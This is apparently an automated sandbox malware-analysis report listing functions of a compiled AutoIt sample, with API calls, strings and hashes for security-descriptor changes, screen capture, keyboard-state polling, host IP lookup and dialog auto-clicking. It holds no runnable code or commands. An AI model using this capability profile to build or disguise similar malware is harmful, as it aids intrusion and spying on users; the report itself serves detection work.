__recalloc_crt.LIBCMT ref: 0030AC52
__recalloc_crt.LIBCMT ref: 0030AC97
_strlen.LIBCMT ref: 0030ACC3
__calloc_crt.LIBCMT ref: 0030ACCD
_strlen.LIBCMT ref: 0030ACDC
SetEnvironmentVariableA.KERNEL32(00000000,00000000,?,?,?,?,00000000,00000000), ref: 0030AD0A
_free.LIBCMT ref: 0030AD24
_free.LIBCMT ref: 0030AD31
_free.LIBCMT ref: 0030AD43
__invoke_watson.LIBCMT ref: 0030AD5D

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
String ID:
API String ID: 884005220-0
Opcode ID: fb90b88daeab8d583bc7f27a5f7060e96025d002c0ce8ee6bbcd98aecf67efb2
Instruction ID: d5c2aa0e8ea6dd3eeff65be75511edce23b335fdb4da77b7b8b5a4cf2b370cbf
Opcode Fuzzy Hash: fb90b88daeab8d583bc7f27a5f7060e96025d002c0ce8ee6bbcd98aecf67efb2
Instruction Fuzzy Hash: 41613772512B06AFEB229F24FC61B79B7E8EF11361F164226E801DB1D1DB75C841CB92

Function 003283F4 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0032874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00328766
Part of subcall function 0032874A: GetLastError.KERNEL32(?,0032822A,?,?,?), ref: 00328770
Part of subcall function 0032874A: GetProcessHeap.KERNEL32(00000008,?,?,0032822A,?,?,?), ref: 0032877F
Part of subcall function 0032874A: RtlAllocateHeap.NTDLL(00000000,?,0032822A), ref: 00328786
Part of subcall function 0032874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0032879D

Part of subcall function 003287E7: GetProcessHeap.KERNEL32(00000008,00328240,00000000,00000000,?,00328240,?), ref: 003287F3
Part of subcall function 003287E7: RtlAllocateHeap.NTDLL(00000000,?,00328240), ref: 003287FA
Part of subcall function 003287E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00328240,?), ref: 0032880B

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00328458
_memset.LIBCMT ref: 0032846D
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0032848C
GetLengthSid.ADVAPI32(?), ref: 0032849D
GetAce.ADVAPI32(?,00000000,?), ref: 003284DA
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 003284F6
GetLengthSid.ADVAPI32(?), ref: 00328513
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00328522
RtlAllocateHeap.NTDLL(00000000), ref: 00328529
GetLengthSid.ADVAPI32(?,00000008,?), ref: 0032854A
CopySid.ADVAPI32(00000000), ref: 00328551
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00328582
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 003285A8
SetUserObjectSecurity.USER32(?,00000004,?), ref: 003285BC

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 2347767575-0
Opcode ID: 7cc1b996c6692aa57eec4b2d949b6276fff018a3a478beb6aaf6e2713009cc0f
Instruction ID: 71c684d1552fb759a53b5ea8c3bd25e1dceeaa8cdae61ae75cb4c725a0e323bd
Opcode Fuzzy Hash: 7cc1b996c6692aa57eec4b2d949b6276fff018a3a478beb6aaf6e2713009cc0f
Instruction Fuzzy Hash: 44616A71901219AFDF02DFA4EC44AEEBBB9FF05301F188129F915A72A1DB349A05CF60

Function 0034762D Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 003476A2
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 003476AE
CreateCompatibleDC.GDI32(?), ref: 003476BA
SelectObject.GDI32(00000000,?), ref: 003476C7
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 0034771B
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00347757
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 0034777B
SelectObject.GDI32(00000006,?), ref: 00347783
DeleteObject.GDI32(?), ref: 0034778C
DeleteDC.GDI32(00000006), ref: 00347793
ReleaseDC.USER32(00000000,?), ref: 0034779E

Strings

(, xrefs: 00347723

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: dcbf01f080a4be2a4a384ff20e30fca8fc765b4c3501b8b0858b03204aad877c
Instruction ID: 3f34899f144b33c441ecb02cc80897ef95ae9a51cc701100841a51aca525c6bc
Opcode Fuzzy Hash: dcbf01f080a4be2a4a384ff20e30fca8fc765b4c3501b8b0858b03204aad877c
Instruction Fuzzy Hash: 58513975904309EFCB16CFA8CC85EAEBBF9EF48710F14852DF94997260D735A9408B60

Function 002D6BEC Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 002F0B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,002D6C6C,?,00008000), ref: 002F0BB7

Part of subcall function 002D48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002D48A1,?,?,002D37C0,?), ref: 002D48CE

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 002D6D0D
SetCurrentDirectoryW.KERNEL32(?), ref: 002D6E5A

Part of subcall function 002D59CD: _wcscpy.LIBCMT ref: 002D5A05

Part of subcall function 002F387D: _iswctype.LIBCMT ref: 002F3885

Strings

Error opening the file, xrefs: 0030E866, 0030E8E1
Unterminated string, xrefs: 0030EC0D
#include depth exceeded. Make sure there are no recursive includes, xrefs: 0030E84A
Bad directive syntax error, xrefs: 0030EBC6
AU3!, xrefs: 002D6CC1
EA06, xrefs: 0030E87B
>>>AUTOIT SCRIPT<<<, xrefs: 0030E8BF

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-1018226102
Opcode ID: a15d599ee4dafeb9aef65ad53482a2dda0c3fdd5dd4296628431536e5460e4e2
Instruction ID: 873cd991e3b57383d33674a575c73d51dfba3567f3b49dfe1af28712fdee3e82
Opcode Fuzzy Hash: a15d599ee4dafeb9aef65ad53482a2dda0c3fdd5dd4296628431536e5460e4e2
Instruction Fuzzy Hash: 27029A712183419FC725EF24C891AAFBBE5AF88354F04492EF486972A2DB70DD59CF42

Function 002D45DF Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 002D45F9
GetMenuItemCount.USER32(00396890), ref: 0030D7CD
GetMenuItemCount.USER32(00396890), ref: 0030D87D
GetCursorPos.USER32(?), ref: 0030D8C1
SetForegroundWindow.USER32(00000000), ref: 0030D8CA
TrackPopupMenuEx.USER32(00396890,00000000,?,00000000,00000000,00000000), ref: 0030D8DD
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0030D8E9

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 2751501086-0
Opcode ID: 01a536a13c119d75556962c7c0a4b6f5a901e437d534fac1c51b46be1a7790a1
Instruction ID: 405923b4ecf285481ddc6b71ab16a0e1afbc16482bfd07c1e56b7f0bb56f6810
Opcode Fuzzy Hash: 01a536a13c119d75556962c7c0a4b6f5a901e437d534fac1c51b46be1a7790a1
Instruction Fuzzy Hash: 3F712B70641205BFFB229F54DC95FAABFA8FF05768F104216F525AA1E1C7B1AC20DB90

Function 003510A5 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00350038,?,?), ref: 003510BC

Strings

HKCR, xrefs: 00351164
HKEY_CURRENT_USER, xrefs: 0035119B
HKEY_USERS, xrefs: 003511BD
HKU, xrefs: 003511CE
HKEY_LOCAL_MACHINE, xrefs: 00351125
HKEY_CURRENT_CONFIG, xrefs: 00351179
HKLM, xrefs: 0035113A
HKCC, xrefs: 0035118A
HKEY_CLASSES_ROOT, xrefs: 0035114F
HKCU, xrefs: 003511AC

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: 34731c35d214250e0850b1ba2dac9a68a606db77285be70573e7df7e17001896
Instruction ID: b4287b70194a8fc769766d4a39f222e640882b3cab9506e310c6787f53da7902
Opcode Fuzzy Hash: 34731c35d214250e0850b1ba2dac9a68a606db77285be70573e7df7e17001896
Instruction Fuzzy Hash: 5541507416034F8BCF22EF90D891AEA7724EF16341F5144A5ED915B2A2D730AE2ACB60

Function 00335569 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 002D7D2C: _memmove.LIBCMT ref: 002D7D66

Part of subcall function 002D7A84: _memmove.LIBCMT ref: 002D7B0D

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 003355D2
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 003355E8
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003355F9
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0033560B
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0033561C

Strings

alias PlayMe, xrefs: 003355AB
open , xrefs: 00335581
play PlayMe wait, xrefs: 00335606
close PlayMe, xrefs: 003355E3, 00335610
status PlayMe mode, xrefs: 003355CD
play PlayMe, xrefs: 00335617

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: f35f2838b57102223c10f24de1e26b1f6ad9ef678af124be0fbecd5adcd0b6d4
Instruction ID: 409c1ef5d0792d0a0ff47bbe2f601f64ad99fde4200161e7a033c211cf9980df
Opcode Fuzzy Hash: f35f2838b57102223c10f24de1e26b1f6ad9ef678af124be0fbecd5adcd0b6d4
Instruction Fuzzy Hash: C611982456066979E721B661CC8ADFF7B7CEF95B00F40046BB801921D1EEA41E15CAA1

Function 003348F3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000101,?), ref: 0033490E
gethostname.WS2_32(?,00000100), ref: 00334928
gethostbyname.WS2_32(?), ref: 00334935
_wcscpy.LIBCMT ref: 0033495D
_memmove.LIBCMT ref: 00334970
inet_ntoa.WS2_32(?), ref: 0033497B
_strcat.LIBCMT ref: 00334989
_wcscpy.LIBCMT ref: 003349A0
WSACleanup.WS2_32 ref: 003349AE
_wcscpy.LIBCMT ref: 003349BC

Strings

0.0.0.0, xrefs: 00334957

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: 824a7c753ea49ef9c1839c7a61bb937bd3ef4897dc86f9674fbf51ec695726f0
Instruction ID: 96b659913b610a97a3ec1fc9c7f16d2a9c9b4884c79f1f982b8fcde3ac9175ed
Opcode Fuzzy Hash: 824a7c753ea49ef9c1839c7a61bb937bd3ef4897dc86f9674fbf51ec695726f0
Instruction Fuzzy Hash: BB11D531914218AFCB22FB24AC86FEB77ACDB05761F0402B6F504960A1EF71AA958A51

Function 00335217 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 0033521C

Part of subcall function 002F0719: timeGetTime.WINMM(?,75C0B400,002E0FF9), ref: 002F071D

Sleep.KERNEL32(0000000A), ref: 00335248
EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 0033526C
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0033528E
SetActiveWindow.USER32 ref: 003352AD
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 003352BB
SendMessageW.USER32(00000010,00000000,00000000), ref: 003352DA
Sleep.KERNEL32(000000FA), ref: 003352E5
IsWindow.USER32 ref: 003352F1
EndDialog.USER32(00000000), ref: 00335302

Strings

BUTTON, xrefs: 00335280

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 2711873b0806206b91c7c6053e4b4ab2ba5a17cf0f882edc7088397f3b9d62e8
Instruction ID: 7b8c9d980b4320d322add5758ffc913d0aea2a94d30ef54d1b2625ef242dcb83
Opcode Fuzzy Hash: 2711873b0806206b91c7c6053e4b4ab2ba5a17cf0f882edc7088397f3b9d62e8
Instruction Fuzzy Hash: 2721AC71204B05AFE7036F30ECC9B2B7B6DEB47397F020829F442861B1DB669D448B22

Function 0033052C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 003305A7
SetKeyboardState.USER32(?), ref: 00330612
GetAsyncKeyState.USER32(000000A0), ref: 00330632
GetKeyState.USER32(000000A0), ref: 00330649
GetAsyncKeyState.USER32(000000A1), ref: 00330678
GetKeyState.USER32(000000A1), ref: 00330689
GetAsyncKeyState.USER32(00000011), ref: 003306B5
GetKeyState.USER32(00000011), ref: 003306C3
GetAsyncKeyState.USER32(00000012), ref: 003306EC
GetKeyState.USER32(00000012), ref: 003306FA
GetAsyncKeyState.USER32(0000005B), ref: 00330723
GetKeyState.USER32(0000005B), ref: 00330731

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: dbea5514fb619c6d0a0d0328fd826d625a34d1e4cf98df029be6b09c6e3da6c7
Instruction ID: 2c9a073ba73c9c23ab368d783fec4d25cc69bbb31fc8f621067a56cfde3cb5e8
Opcode Fuzzy Hash: dbea5514fb619c6d0a0d0328fd826d625a34d1e4cf98df029be6b09c6e3da6c7
Instruction Fuzzy Hash: E551DB70A0878819FB3ADBB088E57EABFB49F02380F094599D5C25A1C2DA64DB4CCB55

Function 0032C72A Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 0032C746
GetWindowRect.USER32(00000000,?), ref: 0032C758
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0032C7B6
GetDlgItem.USER32(?,00000002), ref: 0032C7C1
GetWindowRect.USER32(00000000,?), ref: 0032C7D3
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0032C827
GetDlgItem.USER32(?,000003E9), ref: 0032C835
GetWindowRect.USER32(00000000,?), ref: 0032C846
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0032C889
GetDlgItem.USER32(?,000003EA), ref: 0032C897
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0032C8B4
InvalidateRect.USER32(?,00000000,00000001), ref: 0032C8C1

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: a35ecb53e9228dea44bcba67f426b4092ddf4ca6c9f9ecd130b89badf65cfa13
Instruction ID: dcbfafbd7e56016b4d46f478ed652e7a07ffba530d6402fa74d993908a4033a6
Opcode Fuzzy Hash: a35ecb53e9228dea44bcba67f426b4092ddf4ca6c9f9ecd130b89badf65cfa13
Instruction Fuzzy Hash: 61512E71B10305AFDB19CFA9DD99AAEBBBAEB88311F14812DF516D72A0D7709D008B50

Function 002D21A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 002D25DB: GetWindowLongW.USER32(?,000000EB), ref: 002D25EC

GetSysColor.USER32(0000000F), ref: 002D21D3

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 73033cfd494038bb6d6f926a4f60b2ff297abc414e3d5cce48cb32e78b9e6fdf
Instruction ID: f50da486907f6db96c56f3706bce09b148298bd4b10b70cf801b37c963f17c4a
Opcode Fuzzy Hash: 73033cfd494038bb6d6f926a4f60b2ff297abc414e3d5cce48cb32e78b9e6fdf
Instruction Fuzzy Hash: 4F41C131014640DFDB265F28EC48BB93B69EB16331F144366FD658A2E2C7318D56DB21

Function 0033AB12 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,0035F910), ref: 0033AB76
GetDriveTypeW.KERNEL32(00000061,0038A620,00000061), ref: 0033AC40
_wcscpy.LIBCMT ref: 0033AC6A

Strings

network, xrefs: 0033ABD4
all, xrefs: 0033AB7C
removable, xrefs: 0033ABA8
fixed, xrefs: 0033ABBE
ramdisk, xrefs: 0033ABEA
unknown, xrefs: 0033AC01
cdrom, xrefs: 0033AB92

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
